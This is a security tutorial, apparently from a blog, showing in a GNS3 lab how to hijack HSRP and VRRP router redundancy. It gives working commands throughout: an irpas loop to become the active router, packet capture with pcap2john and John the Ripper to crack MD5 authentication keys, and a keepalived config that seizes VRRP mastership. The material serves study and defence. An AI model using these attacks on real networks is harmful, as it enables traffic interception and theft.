Often, network segments will use two routers so that in the event there is an issue with the primary router, a secondary device can take over. To ensure traffic transitions to the secondary router when a failure occurs, a virtual IP address is used that can move between the primary and backup router.
There are a number of protocols that can be used to ensure this happens, which are known as First Hop Redundancy Protocols (FHRP). This article will be looking at two common FHRP protocols, HSRP and VRRP.
Hot Standby Router Protocol (HSRP)
HSRP is a Cisco proprietary protocol that runs on UDP port 1985. To emulate Cisco routers, I’m using GNS3 with the following network topology. Just two virtual routers (R1/R2), that are bridged to a Kali virtual machine
HSRP is then configured on the routers using the following configuration statements.
Router R1 configuration
R1#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#interface FastEthernet 0/0
R1(config-if)#ip address 192.168.1.20 255.255.255.0
R1(config-if)#no shutdown
R1(config-if)#standby 1 ip 192.168.1.22
R1(config-if)#standby 1 priority 104
R1(config-if)#standby 1 preempt
R1(config-if)#end
Router R2 configuration
R2#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
R2(config)#interface FastEthernet 0/0
R2(config-if)#ip address 192.168.1.21 255.255.255.0
R2(config-if)#no shutdown
R2(config-if)#standby 1 ip 192.168.1.22
R2(config-if)#standby 1 priority 108
R2(config-if)#standby 1 preempt
R2(config-if)#end
Using Wireshark, we can see that by default, a plaintext authentication key of “cisco” is being used.
Attacking HSRP
If an adversary sends a HSRP packet with a higher priority than the existing routers on the network, we can become the active router.
This can be exploited using the irpas package that is available in the Kali repositories. In this example we’re using the default authentication string of “cisco”.
sudo ifconfig eth0:1 192.168.1.22 up
while (true);
do (sudo hsrp -d 224.0.0.2 -v192.168.1.22 -a cisco -g 1 -i eth0 ; sleep 3);
done
Whilst this is running, you should see the active router transition to being our Kali system (192.168.1.89).
R2#show standby brief
P indicates configured to preempt.
|
Interface Grp Prio P State Active Standby Virtual IP
Fa0/0 1 108 P Active local 192.168.1.20 192.168.1.22
R2#
*Mar 1 01:46:43.171: %HSRP-5-STATECHANGE: FastEthernet0/0 Grp 1 state Active -> Speak
R2#show standby brief
P indicates configured to preempt.
|
Interface Grp Prio P State Active Standby Virtual IP
Fa0/0 1 108 P Speak 192.168.1.89 192.168.1.20 192.168.1.22
Cracking HSRP MD5 Authentication
To prevent any host on the network from becoming the FHRP master router, MD5 authentication can be configured on the routers. This can be done by issuing the following interface configuration statements.
R1(config-if)#standby 1 authentication md5 key-string 0 bordergate
R2(config-if)#standby 1 authentication md5 key-string 0 bordergate
We can intercept and crack the MD5 encrypted string. First, capture some HSRP packets using tcpdump.
┌──(kali㉿kali)-[~]
└─$ sudo tcpdump -nn -i eth0 port 1985 -w hsrp.pcap
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
3 packets received by filter
The Python script, pcap2john.py that is included in John the Ripper can be used to extract the hash of the MD5 string. I found the version included in Kali didn’t work correctly, so getting the latest version from the Github repository is recommended.
Running this will produce hashes for the HSRP MD5 authentication, as can be seen below.
python3 /home/kali/john/run/pcap2john.py /home/kali/hsrp.pcap
Note: This program does not have the functionality of wpapcap2john, SIPdump, eapmd5tojohn, and vncpcap2john programs which are included with JtR Jumbo.
$hsrp$00000803ff6901000000000000000000c0a80116041c01000000c0a801140000000000000000000000000000000000000000$376cde5ed8ace1b2f4090342c7d18592
$hsrp$00001003ff6c01000000000000000000c0a80116041c01000000c0a801150000000000000000000000000000000000000000$5643a5d3229be6ebfa3c9ce431329c37
The hashes can then be cracked using John the Ripper.
┌──(kali㉿kali)-[~]
└─$ john hashes.txt -w:wordlist.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (hsrp, "MD5 authentication" HSRP, HSRPv2, VRRP, GLBP [MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 4 needed for performance.
bordergate (?)
bordergate (?)
2g 0:00:00:00 DONE (2024-08-28 15:02) 100.0g/s 50.00p/s 100.0c/s 100.0C/s bordergate
I’m not aware of a tool that can send HSRP packets with MD5 authentication, so at this point your options are either use an IOS router simulator (such as GNS3) bridged to the target network, or write some scapy code to perform the task.
Virtual Router Redundancy Protocol (VRRP)
VRRP is an open standard that is defined in RFC 5798. VRRP can be configured in a similar manner to HSRP on the Cisco devices.
Router R1 configuration
R1#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#interface FastEthernet 0/0
R1(config-if)#ip address 192.168.1.20 255.255.255.0
R1(config-if)#no shutdown
R1(config-if)#vrrp 1 ip 192.168.1.22
R1(config-if)#vrrp 1 priority 100
R1(config-if)#end
Router R2 configuration
R2#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
R2(config)#interface FastEthernet 0/0
R2(config-if)#ip address 192.168.1.21 255.255.255.0
R2(config-if)#no shutdown
R2(config-if)#vrrp 1 ip 192.168.1.22
R2(config-if)#vrrp 1 priority 200
R2(config-if)#end
Based on the configuration, router R2 will assume the role of master.
R1#show vrrp brief
Interface Grp Pri Time Own Pre State Master addr Group addr
Fa0/0 1 100 3609 Y Backup 192.168.1.21 192.168.1.22
R2#show vrrp brief
Interface Grp Pri Time Own Pre State Master addr Group addr
Fa0/0 1 200 3218 Y Master 192.168.1.21 192.168.1.22
VRRP is a layer 2 protocol (rather than relying on TCP/IP like HSRP). Traffic can be captured with the following tcpdump filter.
sudo tcpdump -nn -i any vrrp
[sudo] password for user:
tcpdump: data link type LINUX_SLL2
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes
16:53:57.327012 enp37s0 Out IP 192.168.1.21 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 200, authtype none, intvl 1s, length 20
16:53:58.181019 enp37s0 Out IP 192.168.1.21 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 200, authtype none, intvl 1s, length 20
16:53:59.066314 enp37s0 Out IP 192.168.1.21 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 200, authtype none, intvl 1s, length 20
Attacking VRRP
To become the master router using VRRP, we can use the keepalived daemon. This can be installed and configured in Kali using the following commands.
┌──(kali㉿kali)-[~]
└─$ sudo apt install keepalived
┌──(kali㉿kali)-[~]
└─$ cat /etc/keepalived/keepalived.conf
vrrp_instance bordergate {
state MASTER
interface eth0
virtual_router_id 1
priority 250
advert_int 1
virtual_ipaddress {
192.168.1.22
}
}
┌──(kali㉿kali)-[~]
└─$ /etc/init.d/keepalived start
Starting keepalived (via systemctl): keepalived.service.
After starting the daemon, we can see that the Cisco router that was previously a master relinquishes the FHRP address.
*Mar 1 00:42:36.419: %VRRP-6-STATECHANGE: Fa0/0 Grp 1 state Master -> Backup
R2#show vrrp brief
Interface Grp Pri Time Own Pre State Master addr Group addr
Fa0/0 1 200 3218 Y Backup 192.168.1.89 192.168.1.22
And the address is now allocated to our Kali host:
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:d2:26:79 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.89/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0
valid_lft 81516sec preferred_lft 81516sec
inet 192.168.1.22/32 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::ed17:dba5:ec86:1e71/64 scope link noprefixroute
valid_lft forever preferred_lft forever
Cracking VRRP MD5 Authentication
Similar to HSRP, we can configure an MD5 authentication string.
R1(config-if)#vrrp 1 authentication md5 key-string 0 Welcome123
R2(config-if)#vrrp 1 authentication md5 key-string 0 Welcome123
We can intercept the traffic and crack the MD5 value offline. Although pcap2john identifies the hashes as HSRP, these are VRRP packets it’s parsing.
┌──(kali㉿kali)-[~]
└─$ sudo tcpdump -nn -i eth0 vrrp -w vrrp.pcap
[sudo] password for kali:
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
5 packets received by filter
0 packets dropped by kernel
┌──(kali㉿kali)-[~]
└─$ pcap2john vrrp.pcap
Note: This program does not have the functionality of wpapcap2john, SIPdump, eapmd5tojohn, and vncpcap2john programs which are included with JtR Jumbo.
1:$hsrp$2101c801fe010000c0a801160000000000000000$881009a346aa617df0ceab142e41e9e5
2:$hsrp$2101c801fe010000c0a801160000000000000000$881009a346aa617df0ceab142e41e9e5
3:$hsrp$2101c801fe010000c0a801160000000000000000$881009a346aa617df0ceab142e41e9e5
4:$hsrp$2101c801fe010000c0a801160000000000000000$881009a346aa617df0ceab142e41e9e5
5:$hsrp$2101c801fe010000c0a801160000000000000000$881009a346aa617df0ceab142e41e9e5
┌──(kali㉿kali)-[~]
└─$ john vrrp.hashes -w:/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (hsrp, "MD5 authentication" HSRP, HSRPv2, VRRP, GLBP [MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Welcome123 (1)
1g 0:00:00:00 DONE (2024-08-29 10:51) 16.66g/s 3276Kp/s 3276Kc/s 3276KC/s becky21..piggy9
Warning: passwords printed above might not be all those cracked
Unfortunately, keepalived does not seem to support Cisco’s MD5 authentication for VRRP (although it can implemented IPSEC-AH to prevent spoofing and replay attacks). So, once again you would need to use an Cisco IOS device, or device emulator to transmit the traffic.
In Conclusion
FHRP traffic is frequently sent out to network segments that contain user devices, rather than being isolated to a separate VLAN or network. As such, an adversary may be able to spoof advertisements to ensure all traffic leaving the network is routed through their machine.